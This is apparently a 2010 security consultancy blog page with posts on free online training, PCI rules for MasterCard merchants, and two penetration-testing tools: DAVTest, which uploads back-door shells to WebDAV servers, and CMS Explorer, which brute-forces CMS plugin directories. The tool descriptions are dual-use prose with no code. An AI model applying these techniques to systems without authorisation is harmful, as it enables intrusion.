Thursday, July 8, 2010

Free Online Cyber Security Awareness Training

As a consultant, I find it extremely difficult to meet continuing professional education (CPE) requirements by carving out time to attend instructor-lead training courses. While there are many different ways to earn CPE's, I prefer self-paced, on-line training. As luck would have it, I became aware of several *free* on-line training courses offered by the Texas Engineering Extension Service (TEEX) at They have a large selection of free courses delivered using an intuitive Adobe Flash interface.

In the area of cybercrime, a relatively new course catalog has been added that covers topics such as secure programming, information security basics, business continuity, and digital forensics, among other titles.

A few nice features of the training delivery include:

  • A pre-assessment quiz to measure your current mastery of the topic. Subsequent to the quiz, you receive your score and know where you need to focus your training efforts to fill any knowledge gaps.
  • Free-flowing modules that allow you to skip around to areas you want to tackle first.
  • Copious references for further study.
  • Useful material that is both relevant and pertinent in today's environment.
  • You receive an official PDF certificate for your records so you can submit as proof of course completion.
  • Most importantly, it's both on-line and FREE!

In addition, there are other subjects relating to domestic security and threat awareness that are both offered on-line and during scheduled, instructor-lead courses.

I hope you find it as useful as I did, and hopefully this makes it a bit easier to stay current with your CPE's.

Tuesday, May 4, 2010

More on WebDAV Testing

Since the release of DAVTest, there have been two developments which seemed worth mentioning here:
  • Ryan Linn released a Metasploit module based on the DAVTest idea. Like DAVTest, it attempts to use mathematical operations to determine if code can execute on the web server.
  • Chris Gates posted a good article titled "More with Metasploit and WebDAV," which gives a nice tutorial on how to exploit misconfigured web servers using Ryan Linn's module with Metasploit. It also points out a nice trick feature with IIS/ASP.
I'm glad the idea of using simple/standard operations is spreading to other tools, as it's a really efficient way to determine what you can and can't do remotely via WebDAV. What we need are simple tests (and back-doors) in more server-side languages.

I'm going to try and whip up a new release of DAVTest in the next week or so, incorporating a few ideas from these guys, as well as a bit of housekeeping and other updates.

If you have suggestions for the next release or tests for more languages, reply here or send me an email.

Tuesday, April 27, 2010

DAVTest: Quickly Test & Exploit WebDAV Servers

When facing off against a WebDAV enabled server during a penetration test, there are two main things to find out: can you upload files, and if so, can you upload executable files?

Testing this can be a little tricky depending on the server configuration--what extensions are you allowed to upload, can you use MOVE, and what about MKCOL?

DAVTest attempts help answer those questions, as well as enable the pentester to quickly gain access to the host. DAVTest tries to upload test files of various extension types (e.g., ".php" or ".txt"), checks if those files were uploaded successfully, and then if they can execute on the server. It also allows for uploading of the files as plain text files and then trying to use the MOVE command to rename them to an executable.

Assuming you can upload an executable, a test file does you no good--so DAVTest can automatically upload a fully functional shell or back-door. It ships with shells for PHP, ASP, ASPX, CFM, JSP, CGI, and PL, and dropping a file in the right directory will let you upload any back-door you like.

DAVTest is written in PERL and licensed under the GNU GPLv3.

Wednesday, March 31, 2010

CMS Explorer (or: what's that CMS running?)

As a developer, as well as a penetration tester, it's often helpful to know what components a site uses to turn it from a vanilla content management system (CMS) into a more useful site. Besides Mediawiki, I'm not aware of any CMS which publicly lists installed components--so the only way you can figure it out is manually or through small clues on the site.

CMS Explorer is an attempt to automate this component discovery. By brute-force requesting directory names for plugins and themes (and with "normal" HTTP responses--at least for now), we can determine which directories exist, and thus which components are installed. The end result is a list of installed items:

What makes CMS Explorer powerful for penetration testing is what happens next. If you use the -explore option with Drupal or Wordpress, the program will pull a list of potentially-existing files directly from the respective CMS code repositories, and then request those files from your target

And just to make it a little more useful (especially "explore" mode), you can also specify a "bootstrap" proxy. If defined, any found file will be requested a second time using this proxy--so you can prime up your favorite proxy (such as Burp or Paros) for doing actual security testing of those files. This proxy is distinct for found items rather than your main scanning proxy, in case you have one of those setups.

And lastly, if you supply an API key, it can search and report back a list of potential issues in the installed component.

CMS Explorer is currently set up to test Drupal, Wordpress and Joomla!/Mambo, with exploration support for Drupal and Wordpress. It is written in PERL and licensed under the GNU GPLv3.

Tuesday, January 26, 2010

New MasterCard Rules for PCI

As many of you are already aware, MasterCard announced in early 2009, changes to Merchant PCI DSS validation requirements under its Site Data Protection (SDP) program. These changes were primarily related to 1) the ability for Merchants to utilize Internal Audit (IA) to conduct the annual onsite assessment and 2) the imposition of more stringent validation requirements for Level 2 Merchants.

In recent weeks, MasterCard has again updated its merchant validation requirements.

To summarize the updated MasterCard requirements:

- Level 1 Merchants may continue to utilize IA to perform the annual onsite assessment, as long as (effective June 30, 2011) the IA staff engaged in validating PCI DSS compliance attend PCI SSC-offered Merchant training programs and pass any PCI SSC associated accreditation program annually.

- Level 2 Merchants are permitted to continue to complete an annual onsite self assessment questionnaire. Alternatively, Level 2 Merchants may, at their discretion, complete an annual onsite assessment conducted by a PCI SSC approved QSA rather than complete an annual self-assessment questionnaire.

- Level 2 Merchants that choose to complete an annual self-assessment questionnaire must ensure that (effective June 30, 2011) staff engaged in the self-assessment attend PCI SSC-offered merchant training programs and pass any associated PCI SSC accreditation program annually.

We are working with our merchant clients to help them navigate the often complex and dynamic requirements associated with maintaining continued compliance with the PCI DSS.